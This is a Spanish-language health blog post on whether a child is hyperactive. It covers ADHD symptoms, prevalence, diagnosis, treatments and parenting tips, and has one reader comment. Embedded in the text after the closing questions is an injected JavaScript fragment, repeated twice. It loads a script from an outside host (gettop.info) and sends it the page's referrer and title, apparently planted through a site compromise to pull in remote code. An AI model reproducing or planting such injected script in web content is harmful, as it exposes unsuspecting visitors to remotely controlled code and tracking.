Salud y belleza » Enfermedades, Niños, Salud

Creo que mi hijo es hiperactivo

1 Comentario

hiperactividadCuando los niños o niñas están despistados a menudo o se muestran en algunos momentos demasiado excitados o inquietos sus padres tienden a pensar que su hijo es hiperactivo. Sin embargo, en la mayoría de los casos se trata solo de una conducta normal, propia de su edad o que se da en un momento concreto. Refleja la personalidad del niño o la niña o su estado de ánimo en un momento específico. En el caso de que tuviera el trastorno de déficit de atención e hiperactividad (TDAH) tendría esa conducta constantemente, todo el día y todo el año. El niño es incapaz de mantener la concentración en cualquier actividad que necesite su atención. Para esta patología existen tratamientos que ayudan a corregir este comportamiento.

Este trastorno de conducta es uno de los más frecuentes durante el periodo de la infancia. Casi un 10% de los infantes lo sufren. Es una enfermedad crónica que se inicia antes de los siete años. Dificulta mucho su aprendizaje y la adaptación social. Con el tiempo los síntomas menguan pero algunas veces persiste durante la adultez. No se sabe la causa de esta enfermedad, solo que tiene predisposición genética y que los tóxicos como las drogas pueden provocarlo. También se puede dar en niños que nacen prematuros o con problemas psicológicos.

No son menos inteligentes que el resto de los niños, simplemente les cuesta más aprender porque padecen a menudo otros trastornos como dislexia o tics nerviosos.

Si usted cree que su hijo tiene esta enfermedad debe consultarlo con sus profesores para saber cuál es su conducta en clase y también con su médico, que aplicará una serie de diagnósticos para determinar si la padece. Sin embargo, no hay ninguna prueba que determine si el niños sufre TDAH.

Normalmente el tratamiento consiste en terapias psicológicas, medicamentos psicoestimulantes para mejorar la atención y apoyo escolar para mejorar el aprendizaje. Algunos de los consejos que suelen dar para que los padres de esos niños puedan controlar mejor su estado son los siguientes:

niña-hiperactiva- Premiar al niño cuando la conducta haya sido buena.

- Ayudarle a autocontrolarse.

- Animarle a que participe en actividades extraescolares.

- Proporcionarle un lugar tranquilo para que pueda estudiar.

- Mantener un orden y una rutina diaria con reglas claras.

- Hablar a menudo con sus profesores y que se siente cerca del mismo en clase.

Sin embargo, no siempre que su hijo o hija esté excitado o sea inquieto piense que es hiperactivo, aunque estas normas pueden servir para corregir también su conducta.

¿Su hijo es hiperactivo? ¿Qué síntomas tiene? ¿Cómo los corrige?s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , , ,

One Comment »

  • Vir said:

    Cómo sé si mi hijo es hiperactivo? Es que es muy nervioso pero los médicos no me hacen caso. Gracias

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.